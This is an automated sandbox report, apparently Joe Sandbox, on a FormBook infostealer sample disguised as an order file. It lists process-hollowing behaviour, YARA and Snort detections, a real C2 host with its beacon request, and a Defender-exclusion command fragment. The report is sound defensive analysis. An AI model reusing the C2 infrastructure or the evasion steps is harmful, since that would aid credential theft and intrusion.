Windows Analysis Report
Order 20233.exe

Overview

General Information

Sample Name: Order 20233.exe
Analysis ID: 780222
MD5: cfc3542e983b4a7436dabb73132cbbdb
SHA1: c792d80b3667badeef358a872cc5b548d9114151
SHA256: 614490e3bf7cf0672ecda890e33b49f4f8b80da18333111489284df04ab7d934
Tags: exe formbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected UAC Bypass using CMSTP
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • Order 20233.exe (PID: 5872 cmdline: C:\Users\user\Desktop\Order 20233.exe MD5: CFC3542E983B4A7436DABB73132CBBDB)
    • aspnet_compiler.exe (PID: 6120 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe MD5: 7809A19AA8DA1A41F36B60B0664C4E20)
    • AddInProcess.exe (PID: 2140 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe MD5: 11D8A500C4C0FBAF20EBDB8CDF6EA452)
    • Microsoft.Workflow.Compiler.exe (PID: 1360 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe MD5: D91462AE31562E241AF5595BA5E1A3C4)
    • dfsvc.exe (PID: 2288 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe MD5: 48FD4DD682051712E3E7757C525DED71)
    • aspnet_wp.exe (PID: 2104 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_wp.exe MD5: 3F68BCF536EEAE067038C67022CDF6D8)
    • aspnet_regsql.exe (PID: 5300 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regsql.exe MD5: F31014EE4DE7FE48E9B7C9BE94CFB45F)
    • aspnet_regiis.exe (PID: 1760 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe MD5: 061D8C0371566D560C5B15C77A34046F)
    • mscorsvw.exe (PID: 3956 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe MD5: B00E9325AC7356A3F4864EAAAD48E13F)
    • ngen.exe (PID: 5612 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe MD5: FBA5E8D94C9EADC279BC06B9CF041A9A)
    • AddInProcess32.exe (PID: 4392 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exe MD5: F2A47587431C466535F3C3D3427724BE)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 5380 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
  • cleanup
{"C2 list": ["www.ahmedo.ch/dcn0/"]}
Source | Rule | Description | Author | Strings
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1f080:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1ddf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1edea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x1a0e9:$sqlite3step: 68 34 1C 7B E1
  • 0x1ac61:$sqlite3step: 68 34 1C 7B E1
  • 0x1a12b:$sqlite3text: 68 38 2A 90 C5
  • 0x1aca6:$sqlite3text: 68 38 2A 90 C5
  • 0x1a142:$sqlite3blob: 68 53 D8 7F 8C
  • 0x1acbc:$sqlite3blob: 68 53 D8 7F 8C

Source | Rule | Description | Author | Strings
0.2.Order 20233.exe.21700429a18.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0.2.Order 20233.exe.21700429a18.0.raw.unpack | INDICATOR_SUSPICIOUS_DisableWinDefender | Detects executables containing artifcats associated with disabling Widnows Defender | ditekSHen
  • 0x9c39:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x9c68:$e2: Add-MpPreference -ExclusionPath
0.2.Order 20233.exe.21700429a18.0.raw.unpack | INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM | Detects executables embedding command execution via IExecuteCommand COM object | ditekSHen
  • 0x9c09:$r1: Classes\Folder\shell\open\command
  • 0x9058:$k1: DelegateExecute
        No Sigma rule has matched
        Timestamp: 01/08/23-16:24:08.929621
        Source IP: 192.168.2.3
        Destination IP: 213.239.221.71
        SID: 2031412
        Source Port: 49698
        Destination Port: 80
        Protocol: TCP
        Classtype: A Network Trojan was detected

        Timestamp: 01/08/23-16:24:08.929621
        Source IP: 192.168.2.3
        Destination IP: 213.239.221.71
        SID: 2031449
        Source Port: 49698
        Destination Port: 80
        Protocol: TCP
        Classtype: A Network Trojan was detected

        Timestamp: 01/08/23-16:24:08.929621
        Source IP: 192.168.2.3
        Destination IP: 213.239.221.71
        SID: 2031453
        Source Port: 49698
        Destination Port: 80
        Protocol: TCP
        Classtype: A Network Trojan was detected

        AV Detection

        Source: Order 20233.exe | ReversingLabs: Detection: 51%
        Source: Order 20233.exe | Virustotal: Detection: 40%
        Source: Yara match | File source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: http://www.ahmedo.ch/dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w== | Avira URL Cloud: Label: malware
        Source: www.ahmedo.ch/dcn0/ | Avira URL Cloud: Label: malware
        Source: iamme-label.com | Virustotal: Detection: 8%
        Source: www.ahmedo.ch/dcn0/ | Virustotal: Detection: 9%
        Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.ahmedo.ch/dcn0/"]}

        Exploits

        Source: Yara match | File source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: Order 20233.exe PID: 5872, type: MEMORYSTR
        Source: Order 20233.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: AddInProcess32.pdb source: mstsc.exe, 00000015.00000002.533525731.00000000054E3000.00000004.10000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 00000011.00000003.308531715.0000000001697000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.305774318.00000000014FF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.431126939.0000000005003000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.531941308.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.428147207.0000000004E69000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.533058558.00000000052BF000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: AddInProcess32.exe, AddInProcess32.exe, 00000011.00000003.308531715.0000000001697000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.305774318.00000000014FF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.431126939.0000000005003000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.531941308.00000000051A0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000003.428147207.0000000004E69000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000015.00000002.533058558.00000000052BF000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: mstsc.pdbGCTL source: AddInProcess32.exe, 00000011.00000003.416107815.000000000386B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.420075103.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: AddInProcess32.pdbpw source: mstsc.exe, 00000015.00000002.533525731.00000000054E3000.00000004.10000000.00040000.00000000.sdmp
        Source: Binary string: c:\TeamCity\buildAgent\work\5644082abfe4d909\EFBuild\obj\Release\Migrate\migrate.pdb source: Order 20233.exe
        Source: Binary string: mstsc.pdb source: AddInProcess32.exe, 00000011.00000003.416107815.000000000386B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000011.00000003.420075103.0000000003BC4000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: C:\agent\1\s\sys\x64\Release\ProcExpDriver.pdb source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp

        Networking

        Source: C:\Windows\explorer.exe | Network Connect: 213.239.221.71 80
        Source: C:\Windows\explorer.exe | Domain query: www.ahmedo.ch
        Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 213.239.221.71:80
        Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 213.239.221.71:80
        Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49698 -> 213.239.221.71:80
        Source: Malware configuration extractor | URLs: www.ahmedo.ch/dcn0/
        Source: Joe Sandbox View | ASN Name: HETZNER-ASDE HETZNER-ASDE
        Source: global traffic | HTTP traffic detected: GET /dcn0/?pFQ0Q=4h6DHJsXwPiPeVap&oRk4IZo0=C4IpA5iiNFvhwRpGGB75QVE24l/FHjdcJi1XKvHDvYafZRhhpOblpVmnT5Y5r50LceSQqf3teF0eh20kxL606x8yuiPd0JQ74w== HTTP/1.1 | Host: www.ahmedo.ch | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
        Source: Joe Sandbox View | IP Address: 213.239.221.71 213.239.221.71
        Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sun, 08 Jan 2023 15:24:08 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 254 | Connection: close | X-Varnish: 1006141483 | Retry-After: 5 | Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 1006141483</p> <hr> <p>Varnish cache server</p> </body></html>
        Source: 4184-48M.21.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: 4184-48M.21.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: 4184-48M.21.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: 4184-48M.21.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
        Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
        Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
        Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
        Source: mstsc.exe, 00000015.00000003.521808734.0000000001016000.00000004.00000020.00020000.00000000.sdmp, 4184-48M.21.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: Order 20233.exe, 00000000.00000002.307240317.00000217000D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sysinternals.com0
        Source: unknown | DNS traffic detected: queries for: www.ahmedo.ch

        E-Banking Fraud

        Source: Yara match | File source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
        Source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
        Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: AddInProcess32.exe PID: 4392, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: mstsc.exe PID: 5380, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: initial sample | Static PE information: Filename: Order 20233.exe
        Source: Order 20233.exe, moabGi8lf8iend/moabGu5ss.cs | Long String: Length: 602136
        Source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
        Source: 0.2.Order 20233.exe.21700429a18.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
        Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000015.00000002.531522475.00000000037F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000011.00000002.428209911.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000015.00000002.524509054.0000000000BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000014.00000000.374923978.000000001033E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000015.00000002.528604995.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000011.00000002.429045725.00000000017F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: AddInProcess32.exe PID: 4392, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: mstsc.exe PID: 5380, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: String function: 0185B150 appears 45 times
        Source: C:\Users\user\Desktop\Order 20233.exeCode function: 0_2_00007FFBAD39A0AD NtResumeThread,0_2_00007FFBAD39A0AD
        Source: C:\Users\user\Desktop\Order 20233.exeCode function: 0_2_00007FFBAD399F90 NtWriteVirtualMemory,0_2_00007FFBAD399F90
        Source: C:\Users\user\Desktop\Order 20233.exeCode function: 0_2_00007FFBAD39A538 NtResumeThread,0_2_00007FFBAD39A538
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess32.exeCode function: 17_2_018999A0 NtCreateSection,LdrInitializeThunk,17_2_018999A0
